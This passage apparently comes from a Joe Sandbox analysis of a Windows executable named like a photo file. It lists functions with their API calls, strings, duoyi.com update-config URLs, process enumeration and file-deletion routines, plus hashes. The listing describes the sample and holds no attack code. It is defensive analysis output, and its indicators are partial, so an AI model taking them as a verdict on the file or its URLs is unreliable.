                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                  • Part of subcall function 004184FD: GdiplusStartup.GDIPLUS(00000BD4,00000BD8,00000000), ref: 00418602
                                                                  • Part of subcall function 004184FD: _memset.LIBCMT ref: 00418612
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: KillTimer$_wcslen$H_prolog3$_memmove$CountExistsFileGdiplusPathStartupTick_malloc_memset
                                                                • String ID: Close, iTimes:%d$DYUpdater.exe$MainDlg.cpp$ZMMain.exe$btnProtocol$clauseList$get version overtime$link$name$protocolId
                                                                • API String ID: 1376863340-1278416701
                                                                • Opcode ID: a7f67e9ede44e01826996513930ea17235a61337d018a886e97006029d7c422c
                                                                • Instruction ID: b057f479a246b8aed266464e5af610465f2627e8ab8e6c0bac98db8919146583
                                                                • Opcode Fuzzy Hash: a7f67e9ede44e01826996513930ea17235a61337d018a886e97006029d7c422c
                                                                • Instruction Fuzzy Hash: B462E470204341DFD720EF64C885BABB7E5BF85304F10497EF99AA7292CB78A944CB56
                                                                Function 0040F9CE Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 330COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0040F9D8
                                                                  • Part of subcall function 0040DCC1: __EH_prolog3.LIBCMT ref: 0040DCC8
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • _memset.LIBCMT ref: 0040FDE2
                                                                • GetPrivateProfileStringW.KERNEL32(Debug,UpdateURL,005FC63C,?,00000100,?), ref: 0040FE1B
                                                                • std::exception::exception.LIBCMT ref: 0040FF54
                                                                • __CxxThrowException@8.LIBCMT ref: 0040FF6F
                                                                  • Part of subcall function 0045A800: std::exception::exception.LIBCMT ref: 0045A939
                                                                  • Part of subcall function 0045A800: __CxxThrowException@8.LIBCMT ref: 0045A94E
                                                                  • Part of subcall function 0045A800: std::exception::exception.LIBCMT ref: 0045A95D
                                                                  • Part of subcall function 0045A800: __CxxThrowException@8.LIBCMT ref: 0045A972
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3C7
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3E1
                                                                  • Part of subcall function 0048A378: __CxxThrowException@8.LIBCMT ref: 0048A3F2
                                                                  • Part of subcall function 00401A8E: std::_Xinvalid_argument.LIBCPMT ref: 00401AA7
                                                                  • Part of subcall function 00480F00: _malloc.LIBCMT ref: 00480F32
                                                                  • Part of subcall function 00480F00: std::exception::exception.LIBCMT ref: 00480F4E
                                                                  • Part of subcall function 00480F00: __CxxThrowException@8.LIBCMT ref: 00480F63
                                                                  • Part of subcall function 00480F00: _memmove.LIBCMT ref: 00480F6E
                                                                  • Part of subcall function 00481D70: _free.LIBCMT ref: 00481DF7
                                                                  • Part of subcall function 0040C94C: _memmove.LIBCMT ref: 0040C970
                                                                  • Part of subcall function 00403347: _memmove.LIBCMT ref: 00403367
                                                                  • Part of subcall function 00448C30: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 00448C96
                                                                  • Part of subcall function 004014B3: __EH_prolog3.LIBCMT ref: 004014BA
                                                                  • Part of subcall function 004014B3: _wcslen.LIBCMT ref: 004014E6
                                                                  • Part of subcall function 0044B530: PathFileExistsW.SHLWAPI(?,0040FDC4,00000001,00000000,00000000,?,type,?,00000002,game,?,ZM_mini_downloader,00000000,00000000,000000FF), ref: 0044B539
                                                                Strings
                                                                • \zmminiinstall.ini, xrefs: 0040FD95
                                                                • game, xrefs: 0040FCF7
                                                                • UpdateURL, xrefs: 0040FE11
                                                                • https://zmconfig.duoyi.com/test/dyinstall_public_test.txt, xrefs: 0040FE92
                                                                • ZM_mini_downloader, xrefs: 0040FCDC
                                                                • https://zmconfig.duoyi.com/dyminiinstall.txt, xrefs: 0040FEA2
                                                                • Debug, xrefs: 0040FE16
                                                                • (, xrefs: 0040FEF4
                                                                • http://zmconfig.duoyi.com/dyminiinstall.txt, xrefs: 0040FED8
                                                                • type, xrefs: 0040FD35
                                                                • https://zmconfig.duoyi.com/test/dyinstall_public.txt, xrefs: 0040FE7C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8Throw$_memmove$FileH_prolog3_malloc$ExistsH_prolog3_ModuleNamePathPrivateProfileStringXinvalid_argument_free_memset_wcslenstd::_
                                                                • String ID: ($Debug$UpdateURL$ZM_mini_downloader$\zmminiinstall.ini$game$http://zmconfig.duoyi.com/dyminiinstall.txt$https://zmconfig.duoyi.com/dyminiinstall.txt$https://zmconfig.duoyi.com/test/dyinstall_public.txt$https://zmconfig.duoyi.com/test/dyinstall_public_test.txt$type
                                                                • API String ID: 1236033023-497386801
                                                                • Opcode ID: 6a1b179fe515fbbb0e00e1ce2c1735f8c61ca8e1a9fab0fe687b6df21f5cd716
                                                                • Instruction ID: 71c969ff6d187c82c58ce8ee239e1127e4672517da037383c1229ac574cd4422
                                                                • Opcode Fuzzy Hash: 6a1b179fe515fbbb0e00e1ce2c1735f8c61ca8e1a9fab0fe687b6df21f5cd716
                                                                • Instruction Fuzzy Hash: A7F16A708012589EDB10EF69C985BD9BBE8AF54304F0841FFED08AF256D7B85644CF65
                                                                Function 004494D0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 141processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32(3D09168B,00000000,EndProcessAndDelFile, path:%s,MainDlg.cpp), ref: 00449500
                                                                • _wcslen.LIBCMT ref: 0044952F
                                                                  • Part of subcall function 0044C190: _wcslen.LIBCMT ref: 0044C1E7
                                                                • _wcslen.LIBCMT ref: 0044958E
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005FD8E0), ref: 004495AB
                                                                • GetLastError.KERNEL32 ref: 004495B8
                                                                • _memset.LIBCMT ref: 004495D0
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004495EA
                                                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00449615
                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000400), ref: 0044962F
                                                                • __wcsnicmp.LIBCMT ref: 0044965D
                                                                • CloseHandle.KERNEL32(00000000), ref: 00449676
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0044968C
                                                                • GetLastError.KERNEL32 ref: 0044969A
                                                                • CloseHandle.KERNEL32(00000000), ref: 004496A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$CloseErrorHandleLastProcessProcess32$CreateCurrentFileFirstModuleNameNextOpenSnapshotToolhelp32__wcsnicmp_memset
                                                                • String ID: EndProcessAndDelFile, path:%s$MainDlg.cpp
                                                                • API String ID: 2490727395-1196282695
                                                                • Opcode ID: 554f56538eb6eb094affb10aca6f4e70cda33edb5cc54fe318a15518e7124c60
                                                                • Instruction ID: 38a035f2bd07a65174147ef2e02136942375fb1692083542eb6dddde9cbce448
                                                                • Opcode Fuzzy Hash: 554f56538eb6eb094affb10aca6f4e70cda33edb5cc54fe318a15518e7124c60
                                                                • Instruction Fuzzy Hash: 0B518571D002189FEB20EF65DC85BAEB7B8FF55304F0085AAE40992640DF399E84DF95
                                                                Function 00447FC0 Relevance: 26.9, APIs: 10, Strings: 5, Instructions: 649COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Xinvalid_argument_memmovestd::_$__snwprintf__swprintf
                                                                • String ID: --%s requires at least %d and at most %d args, yours: %d$no args were found$string too long$unrecognized option %s$vector<T> too long
                                                                • API String ID: 2541195413-2197102816
                                                                • Opcode ID: 52e74970a118ab92539efe817cd6e439ca2ecd4127aa9ad174c30895aa00ba80
                                                                • Instruction ID: 2f017bbfc5effaad69e62a3dd3db2cfa9b822a7989436e84e5751e52af2aca1f
                                                                • Opcode Fuzzy Hash: 52e74970a118ab92539efe817cd6e439ca2ecd4127aa9ad174c30895aa00ba80
                                                                • Instruction Fuzzy Hash: D632D671E002148FEB14DFA8C9806AEB7B1FF89704F14852FD805AB351DB78AD45CB99
                                                                Function 0044FB20 Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • _wcslen.LIBCMT ref: 0044FB93
                                                                • _wcslen.LIBCMT ref: 0044FC4B
                                                                • _wcslen.LIBCMT ref: 0044FCE3
                                                                • _wcslen.LIBCMT ref: 0044FDFD
                                                                • _wcslen.LIBCMT ref: 0044FEB5
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455C1E
                                                                  • Part of subcall function 00455B40: __CxxThrowException@8.LIBCMT ref: 00455D0C
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455D21
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455DBA
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3C7
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3E1
                                                                  • Part of subcall function 0048A378: __CxxThrowException@8.LIBCMT ref: 0048A3F2
                                                                • _wcslen.LIBCMT ref: 0044FFE7
                                                                  • Part of subcall function 00401741: _memmove.LIBCMT ref: 00401796
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Exception@8Throwstd::exception::exception$_malloc_memmove
                                                                • String ID: context$d_event_yiwang_5.2$event_type$logname$network$platform$server$stats_obj$uid
                                                                • API String ID: 3518899758-2031600226
                                                                • Opcode ID: 06aafd40702c938759dcc0a087d2e97f497ae66f5a61363f1aefea98298d908b
                                                                • Instruction ID: c134a8ac41107044e12af8dc704392bac4284375fbd09318fabd931d8439cdeb
                                                                • Opcode Fuzzy Hash: 06aafd40702c938759dcc0a087d2e97f497ae66f5a61363f1aefea98298d908b
                                                                • Instruction Fuzzy Hash: FC0207B05087458FD314DF25C08191BFBE1BF88718F508A2EF8AA97391D778E949CB96
                                                                Function 004029BD Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 204threadtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004029C7
                                                                  • Part of subcall function 00448C30: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 00448C96
                                                                  • Part of subcall function 004014B3: __EH_prolog3.LIBCMT ref: 004014BA
                                                                  • Part of subcall function 004014B3: _wcslen.LIBCMT ref: 004014E6
                                                                • _memset.LIBCMT ref: 00402A0C
                                                                • GetPrivateProfileStringW.KERNEL32(Debug,Log,005FD208,?,00000104,?), ref: 00402A4B
                                                                • GetPrivateProfileStringW.KERNEL32(Debug,BigServerUrl,https://chc-bd.duoyi.com,?,00000104,?), ref: 00402AC4
                                                                • GetCurrentThreadId.KERNEL32 ref: 00402B01
                                                                • SetTimer.USER32(00000000,00000064,000001F4,0040D770), ref: 00402B4B
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                  • Part of subcall function 004466C0: _wcslen.LIBCMT ref: 00446705
                                                                  • Part of subcall function 004466C0: _vwprintf.LIBCMT ref: 0044672D
                                                                  • Part of subcall function 004466C0: __strftime_l.LIBCMT ref: 0044675B
                                                                  • Part of subcall function 004466C0: _wcslen.LIBCMT ref: 00446768
                                                                  • Part of subcall function 00401560: _memmove.LIBCMT ref: 00401581
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$PrivateProfileString_memmove$CurrentFileH_prolog3H_prolog3_ModuleNameThreadTimer__strftime_l_memset_vwprintf
                                                                • String ID: %s|GameId:%d$%s|id:%d$1.0.2|mini_downloader$BigServerUrl$Debug$Log$\zmminiinstall.ini$https://chc-bd.duoyi.com$mini_downloader
                                                                • API String ID: 2293370334-2729419173
                                                                • Opcode ID: df0514ca2c294442ef6d0f07f960b861427525628665aed77afc77ff455f2f57
                                                                • Instruction ID: 20a665b373f4353a8bf0a04a5c59a724b4605063b56e8168b6e6990263b59bdf
                                                                • Opcode Fuzzy Hash: df0514ca2c294442ef6d0f07f960b861427525628665aed77afc77ff455f2f57
                                                                • Instruction Fuzzy Hash: 8B8172719012589EDB10EBA5CD8ABDD77B4AF05308F1041EAE508B71D2DBB89F84CF69
                                                                Function 00407C07 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 315timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • KillTimer.USER32(00000000,00000013,3D09168B,?,?), ref: 00407C55
                                                                • _wcslen.LIBCMT ref: 00407D19
                                                                • _wcslen.LIBCMT ref: 00407D7A
                                                                • _memset.LIBCMT ref: 00407E99
                                                                • _wcslen.LIBCMT ref: 00407FAD
                                                                • GetPrivateProfileStringW.KERNEL32(Setting,Version,005FC63C,?,00000104,?), ref: 00407ED6
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$KillPrivateProfileStringTimer_memmove_memset
                                                                • String ID: --tgid $%s -i "%d" -d$<_$@_$Setting$Version$ywupdate.ini
                                                                • API String ID: 852395171-1002774193
                                                                • Opcode ID: 0a6f8e14020b4b004db4853f45257f0157ddf1b80605a3860903684129d56b17
                                                                • Instruction ID: 562a04badb9e42f10a2ff07001b06efcc84a59d3ac0cb75b4a06459460d6738f
                                                                • Opcode Fuzzy Hash: 0a6f8e14020b4b004db4853f45257f0157ddf1b80605a3860903684129d56b17
                                                                • Instruction Fuzzy Hash: 99C1D3715083419FD720DF25C885B9BB7E5BF85304F00493EF599A72A2DB78A805CB6B
                                                                Function 0041E1E6 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 279libraryloaderwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(msimg32.dll,GradientFill,?,?), ref: 0041E248
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041E24F
                                                                • CreateCompatibleDC.GDI32(?), ref: 0041E2BA
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041E2CA
                                                                • SelectObject.GDI32(?,00000000), ref: 0041E2D7
                                                                • SelectObject.GDI32(?,?), ref: 0041E543
                                                                • DeleteObject.GDI32(?), ref: 0041E54C
                                                                • DeleteDC.GDI32(?), ref: 0041E555
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$CompatibleCreateDeleteSelect$AddressBitmapHandleModuleProc
                                                                • String ID: GradientFill$msimg32.dll
                                                                • API String ID: 3307395696-3632770705
                                                                • Opcode ID: 1fcb73a0498f35769b8f22792db21b5114a4ec594ccec07ed377e74dc2fcd818
                                                                • Instruction ID: 741a54ed5e0549705f56e94684ad46132d7e91fff2eb1ec143a218f0ce74ce84
                                                                • Opcode Fuzzy Hash: 1fcb73a0498f35769b8f22792db21b5114a4ec594ccec07ed377e74dc2fcd818
                                                                • Instruction Fuzzy Hash: 92C15274D002299FCF14DFA9D8889EDBBB2FF49304F10811AE866AB260D734A945DF64
                                                                Function 0040DE6D Relevance: 18.1, APIs: 1, Strings: 9, Instructions: 639COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0040E3A4
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: gray$min$noforce$patchurl$predl$reboot$reqscriptver$silent$version
                                                                • API String ID: 176396367-1113122781
                                                                • Opcode ID: c1f05d6e35ec31a854878b009a433db88b81d30896a2014c3bfbcbc947b9d4f0
                                                                • Instruction ID: c052100b95ab9acbd774c58c1b762f4879c7759ed15a1c0bce757bb36144fae6
                                                                • Opcode Fuzzy Hash: c1f05d6e35ec31a854878b009a433db88b81d30896a2014c3bfbcbc947b9d4f0
                                                                • Instruction Fuzzy Hash: 8B42BE311083408FD720DF25C445BAFBBE0AF85318F444E6EF995672E2DB78A949CB5A
                                                                Function 004600A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 94memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
